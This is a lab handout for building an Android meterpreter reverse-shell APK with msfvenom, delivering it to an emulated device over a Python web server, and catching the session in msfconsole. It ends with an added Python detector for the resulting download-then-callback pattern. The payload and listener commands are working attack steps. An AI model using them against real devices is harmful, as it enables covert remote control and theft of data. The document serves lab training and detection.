Simulation
Setting up Testing Environment
1. Genymotion - Android Emulator
2. VMWare - Virtual Machine/VirtualBox
3. Kali Linux - OS
a. USB for Kali Linux
Installation
1. Install VirtualBox, leave configurations at default
1. Genymotion - installation is mostly just clicking Next, then restarting the machine
a. Make an account for first launch
b.
c. Usage - Personal Use
d. T&C then next
e.
i. to create a virtual device, click the + icon at the top
ii.
iii.
Once a unit is selected, you can customize settings. Preferably leave it as default
1. device needs installation
f. Open VirtualBox, your device should be connected to it
i.
1. select device then click show
g. Open Genymotion and open device
i.
2. Installing Kali Linux in VirtualBox
a.
i. go to New
b.
i. name VM
ii. set file location
iii. OS distribution and version will be set to Debian
iv. Next
c.
i. allocate resources (RAM and CPU usage)
1. once set go Next then Finish
d. if setup looks like this
i.
1. we can directly go to specify virtual hardware (resources)
2. then virtual hard disk
3.
a. this part is where we allocate the disk partition (in this case the machine will be using 20 GB of allotted disk space; you can increase it if your laptop has enough disk space)
b. if you have an external drive/USB with enough disk space, you can change the directory
e.
f. Go to Settings for extra initializations
g. Start and run
h. Install Kali through Graphical Interface and it’s mostly clicking next
i. you can refer here
3. Performing Attack
a. Open Kali
b. Open Terminal from the top bar or press Ctrl+Alt+T
c. ‘ifconfig’ (take note of ip address)
d. creating the malicious apk
i. create a new folder and open terminal there
ii. type commands
1. sudo msfvenom \
2. --platform android \
3. -a java \
4. -p android/meterpreter/reverse_tcp \
5. -o myapp.apk \
6. LHOST=ipaddress \
7. LPORT=4444 (for testing)
8. hit enter
9. once the process completes, type ‘ls’ to verify the payload apk was created
4. Executing Mobile Attack
a. Setup simple Python web server
i. python3 -m http.server 80
1. makes current files accessible via web browser
b. open android virtual device, browser, and enter ip address
i. download app and install
c. setup listener on Kali
i. new terminal tab
1. ‘msfconsole’
a. ‘use exploit/multi/handler’
i. ‘set payload android/meterpreter/reverse_tcp’
ii. ‘show options’
1. LPORT should already be set to 4444
2. set LHOST by typing
a. ‘set LHOST ipaddress’
b. ‘show options’ to verify
iii. ‘run’
1. handler will wait for device to connect
d. open the installed app, allow access to everything
i. monitor metasploit console for changes (meterpreter session)
1. type ‘sysinfo’
2. take note of device details
3. ‘getuid’ for user account
4. ‘help’ for all the possible commands to execute
a. feel free to use at least 5-10 commands
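Detection view of this lab (added example, not part of the original handout): the steps above leave a recognizable network pattern, an .apk fetched over plain HTTP on port 80 followed by a connection from the same device back to the same host on a non-web port such as 4444. The log format, addresses and the 30-minute window below are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample flow records (hypothetical format, lab-only addresses):
# timestamp  client  server  dst_port  detail
SAMPLE_LOG = """\
2024-05-01T10:00:05 192.168.56.101 192.168.56.102 80 GET /myapp.apk
2024-05-01T10:01:10 192.168.56.101 192.168.56.50 443 TLS
2024-05-01T10:03:40 192.168.56.101 192.168.56.102 4444 SYN
2024-05-01T10:05:00 192.168.56.103 192.168.56.60 80 GET /update.apk
2024-05-01T10:06:00 192.168.56.104 192.168.56.102 4444 SYN
2024-05-01T11:30:00 192.168.56.103 192.168.56.60 8080 SYN
"""

WEB_PORTS = {80, 443}
WINDOW = timedelta(minutes=30)  # assumed correlation window


def parse(line):
    """Split one record into (time, client, server, port, detail)."""
    ts, client, server, port, detail = line.split(maxsplit=4)
    return datetime.fromisoformat(ts), client, server, int(port), detail


def find_sideload_callbacks(log_text, window=WINDOW):
    """Flag clients that fetch an .apk over plain HTTP and then connect
    to the same server on a non-web port within `window`."""
    downloads = {}  # (client, server) -> (time, path) of the latest APK fetch
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, server, port, detail = parse(line)
        is_apk = detail.startswith("GET ") and detail.lower().split("?")[0].endswith(".apk")
        if port == 80 and is_apk:
            downloads[(client, server)] = (ts, detail.split()[1])
        elif port not in WEB_PORTS and (client, server) in downloads:
            dl_ts, path = downloads[(client, server)]
            if timedelta(0) <= ts - dl_ts <= window:
                alerts.append({"client": client, "server": server, "apk": path,
                               "callback_port": port,
                               "delay_s": int((ts - dl_ts).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_sideload_callbacks(SAMPLE_LOG):
        print(alert)
```

Only the first client is flagged: the second APK download has no callback inside the window, and the lone connection to port 4444 has no preceding download.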